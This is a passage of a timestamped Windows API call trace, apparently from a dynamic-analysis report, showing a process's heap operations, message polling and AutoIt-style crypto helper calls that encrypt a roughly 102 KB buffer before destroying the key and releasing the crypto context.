[0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.576] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.576] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.576] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.576] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.577] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.577] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.577] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.578] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x18f35, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x18f40) returned 1 [0042.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.578] CharLowerBuffW (in: lpsz="byte[102209]", cchLength=0xc | out: lpsz="byte[102209]") returned 0xc [0042.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.582] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.582] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.582] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x966e88*, pdwDataLen=0x6ae220*=0x18f35, dwBufLen=0x18f40 | out: pbData=0x966e88*, pdwDataLen=0x6ae220*=0x18f40) returned 1 [0042.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.586] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.586] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.586] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.586] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.586] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.595] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.595] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.595] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.595] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.595] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.595] CryptDestroyKey (hKey=0x7c2200) returned 1 [0042.595] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.595] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.595] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.596] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.596] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.596] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.596] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.596] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.596] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.596] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.598] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.598] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.598] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.598] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.598] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.598] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.598] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.598] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.598] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.598] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.599] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.599] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.599] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.600] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.602] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 